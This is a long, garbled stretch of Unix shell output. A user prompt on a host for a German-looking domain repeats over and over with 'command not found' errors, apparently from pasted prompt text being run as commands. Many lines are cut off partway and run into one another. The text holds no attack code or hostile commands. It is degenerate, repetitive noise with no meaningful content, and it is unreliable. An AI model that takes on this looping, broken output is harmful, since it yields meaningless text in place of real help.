bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ +not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneu[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +ash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: basbash: bash:: command not found +h:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not fou[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalbash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +and not found +bash: [goalador@gatanda: commbash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hbash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +h: [goalador@gatanda: combash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found + [goalador@gatanda hhneuauf.bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +d not found +[goalbash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +ot found +bash: [goalador@gatbash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not 